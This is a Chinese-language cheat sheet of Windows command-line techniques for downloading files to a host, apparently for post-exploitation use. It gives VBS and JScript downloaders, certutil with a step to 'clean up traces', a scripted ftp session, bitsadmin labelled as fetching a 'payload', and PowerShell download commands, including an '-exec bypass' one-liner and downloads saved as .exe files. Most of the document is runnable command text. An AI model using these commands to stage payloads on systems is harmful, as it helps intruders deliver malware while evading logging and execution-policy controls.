windows命令行文件下载

1.vbs下载文件

1.执行如下代码echo一个vbs文件

echo set a=createobject(^"adod^"+^"b.stream^"):set w=createobject(^"micro^"+^"soft.xmlhttp^"):w.open^"get^",wsh.arguments(0),0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile wsh.arguments(1),2 >>downfile.vbs

2.使用vbs脚本下载

cscript downfile.vbs http://www.baidu.com/robots.txt C:\Users\John\Desktop\test.txt

3.非交互式的vbs脚本如下

strFileURL = "http://www.baidu.com/robots.txt"
strHDLocation = "c:\\test\\logo.txt"
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
objXMLHTTP.open "GET", strFileURL, false
objXMLHTTP.send()
If objXMLHTTP.Status = 200 Then
Set objADOStream = CreateObject("ADODB.Stream")
objADOStream.Open
objADOStream.Type = 1
objADOStream.Write objXMLHTTP.ResponseBody
objADOStream.Position = 0
Set objFSO = CreateObject("Scripting.FileSystemObject")
If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocati on
Set objFSO = Nothing
objADOStream.SaveToFile strHDLocation
objADOStream.Close
Set objADOStream = Nothing
End if
Set objXMLHTTP = Nothing

2.certutil下载文件

1.下载文件

certutil.exe -urlcache -split -f http://www.baidu.com/robots.txt

2.清理痕迹

certutil.exe -urlcache -split -f http://www.baidu.com/robots.txt delete

3.ftp下载文件

echo open 192.168.1.115 21> ftp.txt
echo 123>> ftp.txt //user
echo 123>> ftp.txt //password
echo binary >> ftp.txt //bin模式
echo get robots.txt >> ftp.txt
echo bye >> ftp.txt

ftp -s:ftp.txt //下载

4.js下载文件

1.downfile.js文件如下

var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);
WinHttpReq.Send();
BinStream = new ActiveXObject("ADODB.Stream"); BinStream.Type = 1;
BinStream.Open(); BinStream.Write(WinHttpReq.ResponseBody);
BinStream.SaveToFile("保存的文件.exe");

2.命令

cscript /nologo downfile.js http://www.baidu.com/robots.txt

5.bitsadmin下载payload

1.windows7 以上版本内置 bitsadmin,用法如下:

bitsadmin /rawreturn /transfer down "https://www.baidu.com/robots.txt" C:\Users\John\Desktop\test666.exe

2.如果下载文件过大配合下面命令提高优先级

bitsadmin /setpriority down foreground

6.powershell文件下载

6.1 powershell脚本文件下载

6.1.1 powershell2版本

1.test.ps1文件如下:

$Urls = @()
$Urls += "http://www.baidu.com/robots.txt"
$OutPath = "C:\Users\John\Desktop\" 
ForEach ( $item in $Urls) {
$file = $OutPath + ($item).split('/')[-1]
(New-Object System.Net.WebClient).DownloadFile($item, $file) 
}

2.命令

powershell -File test.ps1

6.1.2 powershell3版本

1.down.ps1文件内容如下

$url = "http://192.168.1.115/robots.txt"
$output = "C:\inetpub\robots.txt"
$start_time = Get-Date
Invoke-WebRequest -Uri $url -OutFile $output
Write-Output "Time : $((Get-Date).Subtract($start_time).Seconds) second(s)"

2.命令:

powershell down.ps1

6.2 一句话下载

powershell -exec bypass -c (new-object System.Net.WebClient).DownloadFile('http://www.baidu.com/robots.txt','E:\robots.txt')